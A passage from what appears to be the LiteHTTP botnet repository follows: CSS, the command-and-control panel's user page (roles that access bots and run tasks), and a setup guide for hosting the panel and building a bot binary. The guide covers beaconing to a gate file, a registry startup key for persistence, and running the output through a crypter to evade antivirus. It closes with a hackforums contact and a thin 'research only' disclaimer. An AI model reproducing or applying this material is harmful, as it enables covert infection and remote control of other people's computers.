color: #00aeff; 238 | border: 1px solid rgba(255, 255, 255, 0.15); 239 | box-shadow: 0 0 rgba(0, 0, 0, 0); 240 | border-radius: 2px; 241 | -webkit-transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 242 | transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 243 | } 244 | .btn1-primary { 245 | background-color: #098cc8; 246 | color: #ffffff; 247 | border: 1px solid transparent; 248 | box-shadow: 0 0 rgba(0, 0, 0, 0); 249 | border-radius: 2px; 250 | -webkit-transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 251 | transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 252 | background-image: -webkit-linear-gradient(top, #0f9ada, #0076ad); 253 | background-image: linear-gradient(to bottom, #0f9ada, #0076ad); 254 | border: 0; 255 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.3), 0 0 0 1px rgba(255, 255, 255, 0.15) inset; 256 | } 257 | .btn1-primary:hover, .btn1-primary:focus { 258 | background-color: #21b0f1; 259 | color: #ffffff; 260 | border-color: transparent; 261 | box-shadow: 0 0 rgba(0, 0, 0, 0); 262 | } 263 | .btn1-primary:active, .btn1-primary.active { 264 | background-color: #006899; 265 | color: rgba(255, 255, 255, 0.7); 266 | border-color: transparent; 267 | box-shadow: inset 1.5px 1.5px 3px rgba(0, 0, 0, 0.5); 268 | } 269 | .btn1-primary:hover, .btn1-primary:focus { 270 | background-image: -webkit-linear-gradient(top, #37c0ff, #0097dd); 271 | background-image: linear-gradient(to bottom, #37c0ff, #0097dd); 272 | } 273 | .btn1-primary:active, .btn1-primary.active { 274 | background-image: -webkit-linear-gradient(top, #006ea1, #00608d); 275 | background-image: linear-gradient(to bottom, #006ea1, #00608d); 276 | box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.6) inset, 0 0 0 1px rgba(255, 255, 255, 0.07) inset; 277 | } 278 | .info, .pagination-wrap { 279 | text-align: center; 280 | } 281 | h2 { 282 | padding: 10px; 283 | } 284 | .homepage { 285 | margin-top: 50px; 286 | text-align: center; 287 | } 288 | th, td { 289 | border: 1px solid gray; 290 | padding: 5px; 291 | } -------------------------------------------------------------------------------- /Panel/pages/users.php: -------------------------------------------------------------------------------- 1 |
      4 |
      5 |

      Users

      6 |
      7 |
      8 | 9 | You do not have permission to view this page.
      '; 13 | die(); 14 | } 15 | if (isset($_POST['doAdd'])) 16 | { 17 | $user = $_POST['username']; 18 | $pass = hash("sha256", $_POST['password']); 19 | $perm = $_POST['permissions']; 20 | if (ctype_alnum($user)) 21 | { 22 | if (ctype_digit($perm)) 23 | { 24 | switch ($perm) 25 | { 26 | case "1": 27 | $perm = "user"; 28 | break; 29 | case "2": 30 | $perm = "moderator"; 31 | break; 32 | case "3": 33 | $perm = "admin"; 34 | break; 35 | } 36 | $i = $odb->prepare("INSERT INTO users VALUES(NULL, :u, :p, :pr, '1')"); 37 | $i->execute(array(":u" => $user, ":p" => $pass, ":pr" => $perm)); 38 | $i2 = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 39 | $i2->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'], ":r" => "Created user ".$user)); 40 | echo '
      Successfully added new user. Reloading...
      '; 41 | }else{ 42 | echo '
      Permissions was not a digit.
      '; 43 | } 44 | }else{ 45 | echo '
      Username\'s must be alpha-numeric only.
      '; 46 | } 47 | } 48 | if (isset($_GET['del'])) 49 | { 50 | 51 | $del = $_GET['del']; 52 | if (!ctype_digit($del)) 53 | { 54 | echo '
      User ID was not a digit. Reloading...
      '; 55 | }else{ 56 | if ($del != "1") 57 | { 58 | $un = $odb->query("SELECT username FROM users WHERE id = '".$del."'")->fetchColumn(0); 59 | $d = $odb->prepare("DELETE FROM users WHERE id = :i LIMIT 1"); 60 | $d->execute(array(":i" => $del)); 61 | $i3 = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 62 | $i3->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'], ":r" => "Deleted user ".$un)); 63 | echo '
      User has been deleted. Reloading...
      '; 64 | }else{ 65 | echo '
      This user cannot be deleted. Reloading...
      '; 66 | } 67 | } 68 | } 69 | if (isset($_GET['ban'])) 70 | { 71 | $ban = $_GET['ban']; 72 | if (!ctype_digit($ban)) 73 | { 74 | echo '
      User ID was not a digit. Reloading...
      '; 75 | }else{ 76 | if ($ban != "1") 77 | { 78 | list($st,$un) = $odb->query("SELECT status,username FROM users WHERE id = '".$ban."'")->fetch(); 79 | if ($st == "1") 80 | { 81 | $b = $odb->prepare("UPDATE users SET status = '2' WHERE id = :i LIMIT 1"); 82 | $b->execute(array(":i" => $ban)); 83 | $i4 = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 84 | $i4->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'], ":r" => "Banned user ".$un)); 85 | echo '
      User has been banned. Reloading...
      '; 86 | }else{ 87 | $b = $odb->prepare("UPDATE users SET status = '1' WHERE id = :i LIMIT 1"); 88 | $b->execute(array(":i" => $ban)); 89 | $i4 = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 90 | $i4->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'], ":r" => "Unbanned user ".$un)); 91 | echo '
      User has been unbanned. Reloading...
      '; 92 | } 93 | }else{ 94 | echo '
      This user cannot be banned. Reloading...
      '; 95 | } 96 | } 97 | } 98 | ?> 99 | 100 |
      101 | 102 | 106 |
      107 | 108 |
      109 |
      110 | 111 |
      112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | query("SELECT * FROM users"); 126 | while ($us = $users->fetch(PDO::FETCH_ASSOC)) 127 | { 128 | $lds = $odb->prepare("SELECT date FROM plogs WHERE username = :u AND action = 'Logged in' ORDER BY date LIMIT 1"); 129 | $lds->execute(array(":u" => $us['username'])); 130 | $ld = $lds->fetchColumn(0); 131 | if ($ld == NULL || $ld == "") 132 | { 133 | $ld = "Never"; 134 | }else{ 135 | $ld = date("m-d-Y, h:i A", $ld); 136 | } 137 | $stat = ""; 138 | if ($us['status'] == "1") 139 | { 140 | $stat = ''; 141 | }else{ 142 | $stat = ''; 143 | } 144 | echo ''; 145 | } 146 | ?> 147 | 148 |
      #UsernamePermissionLast Access DateActions
      '.$us['id'].''.$us['username'].''.ucfirst($us['privileges']).''.$ld.'
       '.$stat.' 
      149 |
      150 |
      151 |
      152 |
      153 |
      154 |
      155 | 156 |
      157 |
      158 |
      159 | 160 | 161 |
      162 | 163 | 164 |
      165 | 166 | 171 |
      172 |
      173 |
      174 |
      175 |
      176 |
      177 |
      178 |
      179 | 180 | 181 | 182 |
      183 | 184 | 185 |
        186 |
      • 187 |
        188 | 189 |
        User
        190 | 191 |
        192 |

        The User permission limits the user to view and access bots, but cannot manage the settings, manage other users, view logs, or manage tasks the user did not create. The tasks this user cannot use are Update, and Uninstall.

        193 |
      • 194 |
      • 195 |
        196 | 197 |
        Moderator
        198 |
        199 |

        The Moderator permission limits the user to view and access bots, manage other non-admin users, view logs, and manage tasks of other non-admin users, but cannot manage the settings. The tasks this user cannot use are Update, and Uninstall.

        200 |
      • 201 |
      • 202 |
        203 | 204 |
        Admin
        205 |
        206 |

        The Admin permission gives a user full access to the panel, allowing full control over other users and their tasks. This user can run any task.

        207 |
      • 208 |
      209 |
      210 | 211 | 212 | 213 |
      214 | -------------------------------------------------------------------------------- /SETUP GUIDE.md: -------------------------------------------------------------------------------- 1 | Setup Guide 2 | =========== 3 | 4 | This guide will teach you, step by step, how to set up LiteHTTP. Let's get right into it. 5 | 6 | Prerequisites 7 | ------------- 8 | The things you will need to set up LiteHTTP are: 9 |
        10 |
      • A VPS or Webhosting w/ databases
      • 11 |
      • 7Zip, WinRAR, or any archive management tool
      • 12 |
      • Time
      • 13 |
      14 | 15 | I will be using a VPS running CentOS as a demonstration. 16 | 17 | Step 1 - Setting up the panel 18 | ----------------------------- 19 | To start, download the ZIP from Github by clicking the Download ZIP button on the lower right-hand side. 20 | 21 | 22 | 23 | Once you have the ZIP downloaded, go ahead and extract it wherever you like. Next, we want to upload our panel files to our host. Since I am using a VPS, I'm using a tool called WinSCP. This tool is similar to FileZilla, which can also be used. Fill in the information to your VPS like so: 24 | 25 | 26 | 27 | Once you've filled everything out, you can save the login for future use, or just click the Login button. Once you are signed in, you will probably see somthing similar to this: 28 | 29 | 30 | 31 | The next step is to upload our files. This is as easy as opening the LiteHTTP-master folder, and dragging the Panel directory into the WinSCP window. The files will begin to copy onto your server. 32 | 33 | While the files are transferring, we can install a few things we're going to need on our VPS. Go ahead and open Putty and enter the information to your VPS: 34 | 35 | 36 | 37 | Here we can execute commands to manage our server. We will use this to install: PHP, MySQL, Apache, and phpMyAdmin (database management). 38 | 39 | To install software on our CentOS VPS, we are going to use the yum install command. First we'll install Apache by typing this command:
      40 | `yum install httpd` 41 | 42 | It should look like this in your console: 43 | 44 | 45 | 46 | Once it's typed in, hit enter. Yum will do it's pre-install operations, and sooner or later you'll be asked a question to respond with yes or no (y/n), type `y` and hit enter. 47 | 48 | Once yum has completed, Apache is now installed. To make sure Apache starts up if your server is shut down or rebooted, type this command:
      49 | `chkconfig httpd on` 50 | 51 | Now we are going to do the same thing for MySQL by typing this command:
      52 | `yum install mysql mysql-server` 53 | 54 | Follow the same steps as we did with Apache but changing httpd to mysqld, and MySQL will then be installed. This does not mean that MySQL is ready yet, as we still need to setup our root login. To do this, start off by typing:
      55 | `service mysqld start` 56 | 57 | This will start the MySQL server so that we can use it to manage databases. To setup the root login, type the following, but changing `thisismypassword` to your root password:
      58 | `mysqladmin -u root password 'thisismypassword'` 59 | 60 | After hitting enter, the password for the MySQL root user should now be what you set it to. To test this, type the following command and hit enter: 61 | `mysql -u root -p` 62 | 63 | It will ask you for your password, which is the password you supplied in the last step. If you see a screen like this, your password is set: 64 | 65 | 66 | 67 | You can exit MySQL by using CTRL+C. Once you are out of mysql, we're now going to install PHP by typing:
      68 | `yum install php php-devel php-cli php-pdo php-mysql` 69 | 70 | This will install PHP for Apache. Now, installing phpMyAdmin is a little more tedious since we can't install it with yum (yet). In order to install phpMyAdmin with yum, we need to add what is called a `repository` that contains the files we need. To do this, type the following:
      71 | `rpm -ivh http://ftp.jaist.ac.jp/pub/Linux/Fedora/epel/6/i386/epel-release-6-8.noarch.rpm` 72 | 73 | If this command asks you yes or no, type y and hit enter. Now that we have the repository installed, we can then install phpMyAdmin by typing:
      74 | `yum install phpMyAdmin` 75 | 76 | Please note that this command is case-sensitive (the M and A). Once phpMyAdmin is installed, we need to edit Apache's configuration before we can access phpMyAdmin from our webbrowser. To do this, use WinSCP or your transferring client and go to the root directory `/` by double-clicking the `...` directory at the top: 77 | 78 | 79 | 80 | Next, double-click on `etc`, and once inside etc, find the `httpd` directory and double-click it as well. Once you are inside the httpd directory, double-click on `conf.d`. Once you are here, you should see 3 files: 81 | 82 | 83 | 84 | We need to edit `phpMyAdmin.conf` so that we can access phpMyAdmin from our browser. To edit the file, right-click it and click on Edit. Once the file is open in the editor, we need to add a line inside this block: 85 | 86 | 87 | 88 | After the line `Allow from 127.0.0.1`, make a new line and enter: 89 | `Allow from YOUR_IPADDRESS` 90 | 91 | Where YOUR_IPADDRESS is your IP address (can be found from http://ipcow.com). 92 | 93 | Once you've added this line, save and close the file. Now return to your console and type this command:
      94 | `service httpd start` 95 | 96 | If everything is configured and installed correctly, you will see: 97 | 98 | 99 | 100 | The warning about the hostname can be ignored, as it's not going to cause any problems. Now that Apache is running, we can access our phpMyAdmin from the browser. To do so, open a new tab or new window, and type:
      101 | `yourserversip/phpMyAdmin` or `http://mydomain.com/phpMyAdmin` 102 | 103 | Once you've opened this URL, you'll see a page like this: 104 | 105 | 106 | 107 | The username is `root` and the password is the one you specified earlier in the MySQL setup. Once logged in, it'll look something like this (maybe a different theme): 108 | 109 | 110 | 111 | To create our database, click on `Databases` in the navigation menu, and fill in a name for your database and click Create. 112 | 113 | Now that we have created a database, we can upload our SQL file, which is located in the Panel folder from the extracted archive. To upload it, click on your newly created database, and you'll see a screen similar to this: 114 | 115 | 116 | 117 | Click on the `Import` button in the navigation menu. Once there, you'll want to click on `Choose File` and find the SQL file on your computer. Once you've found it, double-click it and then click `Go` at the bottom of the phpMyAdmin screen. phpMyAdmin will then import all the required tables for the bot. 118 | 119 | At this point, we're done with phpMyAdmin and it can be closed. Now that we have set up our database, we can move our previously uploaded `Panel` directory to Apache's directory. To get back to the `root` of your server, keep double-clicking the 3 dots at the top of the current directory. Once at the root, double-click on `root`. There should be a `Panel` directory that we want to move. 120 | 121 | To move this directory, right-click on it, and click on `Move To`, and in this box, type in:
      122 | `/var/www/html/` 123 | 124 | This will move the Panel directory to Apache's root directory. Next, we'll want to move to the same directory. Go back to the root of your server, double-click on `var` -> `www` -> `html`. 125 | 126 | Now that we're here, enter the Panel directory, then enter `inc`, and right-click on `config.php`. Once the editor is open, there are a few settings we need to change: 127 | 128 | 129 | 130 | The `dbhost` stays the same if you are using a VPS, otherwise this is the host of your MySQL server. 131 | The `dbuser` is `root` if you are using a VPS for this tutorial. 132 | The `dbpass` is the password you set in the MySQL setup. 133 | The `dbname` is the database name you chose, in my case `litehttp`. 134 | 135 | At this point, we don't yet have a `encryption/decryption key` yet, because this is generated by the builder. This will come in a later step, but for now, save and close the file. This will make it so we can sign into our panel. To do so, open a new tab or new window, and type in:
      136 | `serverip/Panel/login/` or `http://mydomain.com/Panel/login/` 137 | 138 | This will bring up the login page. Currently, the username and password are: `admin` 139 | 140 | Once signed in, you'll be at the dashboard of the panel. It is highly recommended that you change the password. To change your password, click on your username in the top-right of the screen, and click on `Edit Account`. 141 | 142 | Once there, type in the current password, then your new password, and click on `Change Password`. Once your password is changed, it will take effect the next time you attempt to sign in. 143 | 144 | We are now done with the panel setup! 145 | 146 | Step 2 - Building a bin 147 | ----------------------- 148 | 149 | To build a bin, navigate to the extracted folder and enter the Builder directory. When you open the builder, it will look like this: 150 | 151 | 152 | 153 | Now, before we get into building the bin, there needs to be some clarification about the settings. 154 | 155 | Panel URL - This would be the main URL of your server, whether it be your domain or the IP. For example, if your domain is google.com, in the Panel URL box it should look like this: `http://google.com` or `http://your_servers_ip` 156 | Path to gate file - This is the path to your gate file. This would be everything that comes after the domain or IP address. If you followed this tutorial exactly, you should enter: `/Panel/page.php` 157 | Request Interval - This is how often your bot checks in with the panel, in minutes. If you change this value, you need to update the setting in the panel by clicking on the `Settings` option in the panel 158 | Encryption / Decryption Key - This is the encryption key that is generated for your bin. Don't be alarmed if it has been changing while you're typing your other settings, this is to ensure a true random key. After building your bin, the panel's config.php file needs to be updated with this key in the `$deckey` variable 159 | Startup Key Name - This can be changed or left blank, but this is the name of the registry key to ensure the bot starts back up if the computer is shut down or restarted 160 | Change Icon - You can optionally change the output bin's icon if you wish to do so. 161 | Assembly Info - This is the infomation that is displayed when you hover over the file, or view it's "details" under the file's properties 162 | 163 | Now that we've clarified the settings, we can build the bin. Once the bin is built, copy the encryption key and update the panel with this key before closing the window. 164 | 165 | Now that the bin has been built, we can test it. I do not suggest testing it on your own system, unless you absolutely know what you are doing. It's a safer option to run the file in a Virtual Machine to see if it connects to the panel. 166 | 167 | After running the bin, it should connect to the panel. If it does not, make sure you've done every step correctly, and if you are still having trouble, feel free to contact me: 168 | http://www.hackforums.net/member.php?action=profile&uid=1972967 169 | 170 | Notes 171 | ----- 172 |
        173 |
      • The output bin is most likely not going to be FUD, and will probably require a crypter. If you aren't sure if the crypter you are using is compatible with the bot, it's best to ask the seller/developer of the crypter.
      • 174 |
      • If you are struggling to get this set up, feel free to contact me and I will help you over teamviewer.
      • 175 |
      • This bot is intended for research purposes only! I am against using this for malicious purposes on systems you do not own or do not have permission to be on. Keep in mind that I am not held responsible for your actions, and you bear the full responsibility.
      • 176 |
      177 | --------------------------------------------------------------------------------